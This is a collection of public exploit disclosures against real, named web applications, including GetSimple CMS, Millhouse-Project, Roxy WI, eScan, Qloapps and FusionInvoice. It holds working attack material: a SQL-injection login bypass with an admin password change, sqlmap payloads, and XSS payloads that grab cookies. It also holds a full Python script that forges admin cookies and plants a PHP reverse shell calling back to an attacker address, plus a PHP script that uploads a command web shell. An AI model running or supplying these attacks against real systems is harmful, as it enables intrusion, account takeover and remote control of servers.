<pre><code>## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing<br />## Author: nu11secur1ty<br />## Date: 05.25.2023<br />## Vendor: https://github.com/nikhilkeshava<br />## Software: https://github.com/nikhilkeshava/online-course-registration-<br />## Reference: https://portswigger.net/web-security/sql-injection,<br />https://portswigger.net/web-security/sql-injection/lab-login-bypass<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection<br />attacks. The payloads 77834251' or 6127=6127-- and 98762777' or<br />4535=4542-- were each submitted in the username parameter. These two<br />requests resulted in different responses, indicating that the input is<br />unsafely incorporated into a SQL query. The attacker can use this<br />bypass login vulnerability to send a remote POST request to set a new<br />administrator password for himself, which is absolutely nasty.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```POST<br />POST /online-course-registration/admin/index.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn<br />Content-Length: 62<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/online-course-registration/admin/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=<br /><br />```<br />[+]Exploit:<br />```POST<br />POST /online-course-registration/admin/change-password.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn<br />Content-Length: 58<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/online-course-registration/admin/change-password.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />cpass=password&newpass=password5&cnfpass=password5&submit=<br /><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)<br /><br />## Time spend:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WFTPD 3.25 - Unprotected Credential Storage<br /># Date: 04/01/2023<br /># Exploit Author: golem445<br /># Vendor Homepage: https://www.texis.com/<br /># Tested on: Windows 10<br /># CVE: CVE-2023-33263# <br /><br />#Description: <br /><br />Usernames and hashes are stored in an openly viewable wftpd.ini configuration file within the host WFTPD directory<br /></code></pre>
<pre><code># Exploit Title: Service Provider Management System v1.0 - SQL Injection<br /># Date: 2023-05-23<br /># Exploit Author: Ashik Kunjumon<br /># Vendor Homepage: https://www.sourcecodester.com/users/lewa<br /># Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html<br /># Version: 1.0<br /># Tested on: Windows/Linux<br /><br />1. Description:<br /><br />Service Provider Management System v1.0 allows SQL Injection via ID<br />parameter in /php-spms/?page=services/view&id=2<br />Exploiting this issue could allow an attacker to compromise the<br />application, access or modify data,<br />or exploit the latest vulnerabilities in the underlying database.<br /><br />Endpoint: /php-spms/?page=services/view&id=2<br /><br />Vulnerable parameter: id (GET)<br /><br />2. Proof of Concept:<br />----------------------<br /><br />Step 1 - By visiting the url:<br />http://localhost/php-spms/?page=services/view&id=2 just add single quote to<br />verify the SQL Injection.<br />Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"<br />-p id --dbms=mysql<br /><br />SQLMap Response:<br />----------------------<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT<br />COUNT(*),CONCAT(0x7178717171,(SELECT<br />(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=services/view&id=1' AND (SELECT 1072 FROM<br />(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT<br /><br /></code></pre>
<pre><code># Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)<br /># Date: 2023-05-24<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://www.squarepiginteractive.com<br /># Software Link: https://www.fusioninvoice.com/store<br /># Version: 2023-1.0<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)<br /># CVE: CVE-2023-25439<br /><br />Description:<br /><br />A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to<br />execute arbitrary web scripts or HTML.<br /><br />Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and<br />possibly others) it will be triggered once page gets loaded.<br /><br /><br />Steps to reproduce:<br /><br />- Click on "Expenses", or "Tasks" and add (or edit an existing) one,<br />- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),<br />- Click on 'Save'.<br /><br />Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.<br /><br /><br />Timeline:<br /><br />2023-01-29: Vulnerability discovered<br />2023-01-29: Vendor contacted<br />2023-02-01: No reply, vendor contacted for 2nd time<br />2023-02-02: Request for CVE reservation<br />2023-04-25: Assigned CVE number CVE-2023-25439<br />2023-04-27: No reply, vendor contacted for 3rd time<br />2023-05-15: No reply, vendor contacted for last time<br />2023-05-24: Public disclosure<br /><br /><br />PoC Screenshots:<br /><br />https://imagebin.ca/v/7FOZfztkDs3I<br /><br /><br /></code></pre>
<pre><code># Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)<br /># Data: 18/5/2023<br /># Exploit Author : Youssef Muhammad<br /># Vendor: Get-simple<br /># Software Link:<br /># Version app: 3.3.16<br /># Tested on: linux<br /># CVE: CVE-2022-41544<br /><br />import sys<br />import hashlib<br />import re<br />import requests<br />from xml.etree import ElementTree<br />from threading import Thread<br />import telnetlib<br /><br />purple = "\033[0;35m"<br />reset = "\033[0m"<br />yellow = "\033[93m"<br />blue = "\033[34m"<br />red = "\033[0;31m"<br /><br />def print_the_banner():<br /> print(purple + '''<br /> CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 <br />C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 <br />C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 <br />C V V E 2 00 0 2 2 4 11 5 4 4 <br /> CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 <br /> '''+ reset)<br /><br />def get_version(target, path):<br /> r = requests.get(f"http://{target}{path}admin/index.php")<br /> match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)<br /> if match:<br /> version = match.group(1)<br /> if version <= "3.3.16":<br /> print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")<br /> else:<br /> print ("This is not vulnrable to this CVE")<br /> return version<br /> return None<br /><br />def api_leak(target, path):<br /> r = requests.get(f"http://{target}{path}data/other/authorization.xml")<br /> if r.ok:<br /> tree = ElementTree.fromstring(r.content)<br /> apikey = tree[0].text<br /> print(f"[+] apikey obtained {apikey}")<br /> return apikey<br /> return None<br /><br />def set_cookies(username, version, apikey):<br /> cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()<br /> cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()<br /> cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded',<br /> 'Cookie': cookies<br /> }<br /> return headers<br /><br />def get_csrf_token(target, path, headers):<br /> r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)<br /> m = re.search('nonce" type="hidden" value="(.*)"', r.text)<br /> if m:<br /> print("[+] csrf token obtained")<br /> return m.group(1)<br /> return None<br /><br />def upload_shell(target, path, headers, nonce, shell_content):<br /> upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"<br /> payload = {<br /> 'content': shell_content,<br /> 'edited_file': '../shell.php',<br /> 'nonce': nonce,<br /> 'submitsave': 1<br /> }<br /> try:<br /> response = requests.post(upload_url, headers=headers, data=payload)<br /> if response.status_code == 200:<br /> print("[+] Shell uploaded successfully!")<br /> else:<br /> print("(-) Shell upload failed!")<br /> except requests.exceptions.RequestException as e:<br /> print("(-) An error occurred while uploading the shell:", e)<br />def shell_trigger(target, path):<br /> url = f"http://{target}{path}/shell.php"<br /> try:<br /> response = requests.get(url)<br /> if response.status_code == 200:<br /> print("[+] Webshell trigged successfully!")<br /> else:<br /> print("(-) Failed to visit the page!")<br /> except requests.exceptions.RequestException as e:<br /> print("(-) An error occurred while visiting the page:", e)<br /><br />def main():<br /> if len(sys.argv) != 5:<br /> print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")<br /> return<br /><br /> target = sys.argv[1]<br /> path = sys.argv[2]<br /> if not path.endswith('/'):<br /> path += '/'<br /><br /> ip, port = sys.argv[3].split(':')<br /> username = sys.argv[4]<br /> shell_content = f"""<?php<br /> $ip = '{ip}';<br /> $port = {port};<br /> $sock = fsockopen($ip, $port);<br /> $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);<br /> """<br /><br /> version = get_version(target, path)<br /> if not version:<br /> print("(-) could not get version")<br /> return<br /><br /> apikey = api_leak(target, path)<br /> if not apikey:<br /> print("(-) could not get apikey")<br /> return<br /><br /> headers = set_cookies(username, version, apikey)<br /><br /> nonce = get_csrf_token(target, path, headers)<br /> if not nonce:<br /> print("(-) could not get nonce")<br /> return<br /><br /> upload_shell(target, path, headers, nonce, shell_content)<br /> shell_trigger(target, path)<br /><br />if __name__ == '__main__':<br /> print_the_banner()<br /> main()<br /> <br /></code></pre>
<pre><code><?php<br />/*<br />Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution<br />Date: 12/05/2023<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project<br />Software Link: https://github.com/thrsrossi/Millhouse-Project.git<br />Version: 1.414<br />Tested on: Debian<br />CVE: N/A<br />*/<br /><br /><br />$options = getopt('u:c:');<br /><br />if(!isset($options['u'], $options['c']))<br />die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi<br />\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n<br />\033[0m\n<br />\n");<br /><br />$target = $options['u'];<br /><br />$command = $options['c'];<br /><br />$url = $target . '/includes/add_post_sql.php';<br /><br /><br />$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="title"<br /><br />helloworld<br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="description"<br /><br /><p>sdsdsds</p><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="category"<br /><br />1<br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8<br />Content-Disposition: form-data; name="image"; filename="rose.php"<br />Content-Type: application/x-php<br /><br /><?php<br />$shell = shell_exec("' . $command . '");<br />echo $shell;<br />?><br /><br />------WebKitFormBoundaryzlHN0BEvvaJsDgh8--<br />';<br /><br />$headers = array(<br /> 'Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',<br /> 'Cookie: PHPSESSID=rose1337',<br />);<br /><br />$ch = curl_init($url);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);<br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, $post);<br />curl_setopt($ch, CURLOPT_POST, true);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_HEADER, true);<br /><br />$response = curl_exec($ch);<br />curl_close($ch);<br /><br />// execute command<br /><br />$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);<br />$ch = curl_init($shell);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />$exec_shell = curl_exec($ch);<br />curl_close($ch);<br />echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";<br /><br />?><br /></code></pre>
<pre><code># Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute<br /># Exploit Author: Iyaad Luqman K<br /># Application: Roxy WI <= v6.1.0.0<br /># Vendor Homepage: https://roxy-wi.org<br /># Software Link: https://github.com/hap-wi/roxy-wi.git<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2022-31137<br /><br /><br /># PoC<br />POST /app/options.py HTTP/1.1<br />Host: 192.168.1.44<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 136<br />Origin: https://192.168.1.44<br />Referer: https://192.168.1.44/app/login.py<br />Connection: close<br /><br />show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)<br /># Date: 16/05/2023<br /># Exploit Author: Sahil Ojha<br /># Vendor Homepage: https://www.escanav.com<br /># Software Link: https://cl.escanav.com/ewconsole.dll<br /># Version: 14.0.1400.2281<br /># Tested on: Windows<br /># CVE : CVE-2023-31702<br /><br />*Step of Reproduction/Proof of concept(POC)*<br /><br />1. Login into the escan management console with a valid username and<br />password as root user.<br />2. Navigate to URL:<br />https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176<br />3. Inject the payload into the UsrId parameter to confirm the SQL<br />injection as shown below:<br />https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR<br />DELAY '0:0:5'--&cnt=4176<br />4. The time delay of 5 seconds confirmed that "UsrId" parameter was<br />vulnerable to SQL Injection. Furthermore, it was also possible to dump<br />all the databases and inject OS shell directly into the MS SQL Server<br />using SQLMap tool.<br /><br /></code></pre>
<pre><code># Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)<br /># Date: 15 May 2023<br /># Exploit Author: Astik Rawat (ahrixia)<br /># Vendor Homepage: https://qloapps.com/<br /># Software Link: https://github.com/webkul/hotelcommerce<br /># Version: 1.5.2<br /># Tested on: Kali Linux 2022.4<br /># CVE : CVE-2023-30256<br /><br /><br />Description:<br /><br />A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.<br /><br />Steps to exploit:<br />1) Go to Signin page on the system.<br />2) There are two parameters which can be exploited via XSS<br /> - back<br /> - email_create<br /><br />2.1) Insert your payload in the "back"- GET and POST Request <br /> Proof of concept (Poc):<br /> The following payload will allow you to execute XSS - <br /> <br /> Payload (Plain text): <br /> xss onfocus=alert(1) autofocus= xss<br /><br /> Payload (URL Encoded): <br /> xss%20onfocus%3dalert(1)%20autofocus%3d%20xss<br /><br /> Full GET Request (back): <br /> [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]<br /><br />2.2) Insert your payload in the "email_create" - POST Request Only<br /> Proof of concept (Poc):<br /> The following payload will allow you to execute XSS - <br /><br /> Payload (Plain text): <br /> xss><img src=a onerror=alert(document.cookie)>xss<br /><br /> Payload (URL Encoded): <br /> xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss<br /><br /> POST Request (email_create) (POST REQUEST DATA ONLY): <br /> [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]<br /><br /></code></pre>
<pre><code># Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting<br /># Date: 2023-05-16<br /># Exploit Author: Sahil Ojha<br /># Vendor Homepage: https://www.escanav.com<br /># Software Link: https://cl.escanav.com/ewconsole.dll<br /># Version: 14.0.1400.2281<br /># Tested on: Windows<br /># CVE : CVE-2023-31703<br /><br />*Step of Reproduction/ Proof of Concept(POC)*<br /><br />1. Login into the eScan Management Console with a valid user credential.<br />2. Navigate to URL:<br />https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=<br />3. Now, Inject the Cross Site Scripting Payload in "from" parameter as<br />shown below and a valid XSS pop up appeared.<br />https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=<br />4. By exploiting this vulnerability, any arbitrary attacker could have<br />stolen an admin user session cookie to perform account takeover.<br /><br /></code></pre>
